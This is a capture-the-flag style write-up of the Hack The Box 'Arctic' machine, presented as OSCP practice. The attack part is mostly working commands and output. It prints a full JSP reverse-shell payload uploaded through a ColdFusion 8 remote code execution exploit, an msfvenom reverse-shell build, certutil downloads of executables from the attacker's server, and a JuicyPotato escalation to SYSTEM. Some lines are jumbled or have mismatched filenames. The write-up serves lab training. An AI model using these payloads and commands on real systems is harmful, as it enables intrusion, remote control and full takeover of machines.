In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
.\Juicy.Potato.x86.exe -l 80 -p C:\temp\shell1.exe -t *Nmap scan
# Nmap 7.94 scan initiated Fri Oct 20 06:22:37 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/arctic/results/10.10.10.11/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/arctic/results/10.10.10.11/scans/xml/_quick_tcp_nmap.xml 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-20 06:22:44 EDT for 520s
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
8500/tcp open fmtp? syn-ack
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 20 06:31:24 2023 -- 1 IP address (1 host up) scanned in 527.29 seconds
Looking at that via web browser and we were able to see via http://10.10.10.11:8500/CFIDE/administrator/ , a login page with coldfusion 8 in the banne
checking on Searchsploit
Adobe ColdFusion 7 - Multiple Cross-Site Scripting Vulnerabilities | cfm/webapps/36172.txt
Adobe ColdFusion 8 - Remote Command Execution (RCE) | cfm/webapps/50057.py
Adobe ColdFusion 9 - Administrative Authentication Bypass | windows/webapps/27755.txt
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit) | multiple/remote/30210.rb
I download this and check it on nano and only modify one section
if __name__ == '__main__':
# Define some information
lhost = '10.10.14.2'
lport = 4444
rhost = "10.10.10.11"
rport = 8500
filename = uuid.uuid4().hex
Run the exploit and suprisingly worked straight away
╭─kali@kali ~/HTB/arctic
╰─$ python 50057.py 10.10.10.11 130 ↵
Generating a payload...
Payload size: 1496 bytes
Saved as: 5992dec755364fc987488dd24ddeb4b9.jsp
Priting request...
Content-type: multipart/form-data; boundary=1c024a8201ae46f7ac72e9adbd419593
Content-length: 1697
--1c024a8201ae46f7ac72e9adbd419593
Content-Disposition: form-data; name="newfile"; filename="5992dec755364fc987488dd24ddeb4b9.txt"
Content-Type: text/plain
<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream g8;
OutputStream gX;
StreamConnector( InputStream g8, OutputStream gX )
{
this.g8 = g8;
this.gX = gX;
}
public void run()
{
BufferedReader rC = null;
BufferedWriter ykg = null;
try
{
rC = new BufferedReader( new InputStreamReader( this.g8 ) );
ykg = new BufferedWriter( new OutputStreamWriter( this.gX ) );
char buffer[] = new char[8192];
int length;
while( ( length = rC.read( buffer, 0, buffer.length ) ) > 0 )
{
ykg.write( buffer, 0, length );
ykg.flush();
}
} catch( Exception e ){}
try
{
if( rC != null )
rC.close();
if( ykg != null )
ykg.close();
} catch( Exception e ){}
}
}
try
{
String ShellPath;
if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
ShellPath = new String("/bin/sh");
} else {
ShellPath = new String("cmd.exe");
}
Socket socket = new Socket( "10.10.14.2", 4444 );
Process process = Runtime.getRuntime().exec( ShellPath );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
--1c024a8201ae46f7ac72e9adbd419593--
Sending request and printing response...
<script type="text/javascript">
window.parent.OnUploadCompleted( 0, "/userfiles/file/5992dec755364fc987488dd24ddeb4b9.jsp/5992dec755364fc987488dd24ddeb4b9.txt", "5992dec755364fc987488dd24ddeb4b9.txt", "0" );
</script>
Printing some information for debugging...
lhost: 10.10.14.2
lport: 4444
rhost: 10.10.10.11
rport: 8500
payload: 5992dec755364fc987488dd24ddeb4b9.jsp
Deleting the payload...
Listening for connection...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49592
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
doing a systeminfo
:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 21/10/2023, 9:20:12 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.838 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 10.982 MB
Virtual Memory: In Use: 1.303 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
C:\ColdFusion8\runtime\bin>
and whoami
C:\ColdFusion8\runtime\bin>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
============ =============================================
arctic\tolis S-1-5-21-2913191377-1678605233-910955532-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
==================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
C:\ColdFusion8\runtime\bin>
Prive esc
We check the sysinfo
╰─$ ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
File "/home/kali/HTB/arctic/Windows-Exploit-Suggester/./windows-exploit-suggester.py", line 390
except IOError, e:
^^^^^^^^^^
SyntaxError: multiple exception types must be parenthesized
╭─kali@kali ~/HTB/arctic/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
╭─kali@kali ~/HTB/arctic/Windows-Exploit-Suggester ‹master●›
Juicy Potato
We copy this to our acrtic folder
inPEASx86.exe
dnSpy.Console.exe JuicyPotato.exe nc64.exe Potato.exe
╭─kali@kali ~/exe
╰─$ cd ~/HTB/arctic
╭─kali@kali ~/HTB/arctic
╰─$ ls
50057.py JuicyPotato.exe log1.dat results Windows-Exploit-Suggester
╭─kali@kali ~/HTB/arctic
we create a reverse shell as we know its an x64
─kali@kali ~/HTB/arctic
╰─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -o shell2.exe
^[[6~[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/arctic
╰─$
we serve and upload both to our host
C:\ColdFusion8\runtime\bin>certutil -urlcache -f http://10.10.14.2:90/shell.exe C:\Users\Public\Downloads\shell.ex
certutil -urlcache -f http://10.10.14.2:90/shell.exe C:\Users\Public\Downloads\shell.ex
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.ex
certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\Users\Public\Downloads\JuicyPotato.ex
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\ColdFusion8\runtime\bin>
we run Juicy Potato
JuicyPotato.exe -l 80 -p C:\Users\Public\Downloads\shell.exe -t *
C:\>mkdir temp
mkdir temp
C:\>cd temp
cd temp
C:\temp>certutil -urlcache -f http://10.10.14.2:90/shell3.exe C:\temp\shell3.exe
certutil -urlcache -f http://10.10.14.2:90/shell3.exe C:\temp\shell3.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\temp\JuicyPotato.exe
certutil -urlcache -f http://10.10.14.2:90/JuicyPotato.exe C:\temp\JuicyPotato.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\temp
22/10/2023 12:06 �� <DIR> .
22/10/2023 12:06 �� <DIR> ..
22/10/2023 12:06 �� 347.648 JuicyPotato.exe
22/10/2023 12:05 �� 7.168 shell3.exe
2 File(s) 354.816 bytes
2 Dir(s) 1.431.105.536 bytes free
C:\temp>JuicyPotato.exe -t * -p C:\temp\shell3.exe -l 443
JuicyPotato.exe -t * -p C:\temp\shell3.exe -l 443
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 443
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM
[+] CreateProcessWithTokenW OK
C:\temp>
╭─kali@kali ~/scripts
╰─$ nc -nlvp 443 1 ↵
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.11] 49865
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>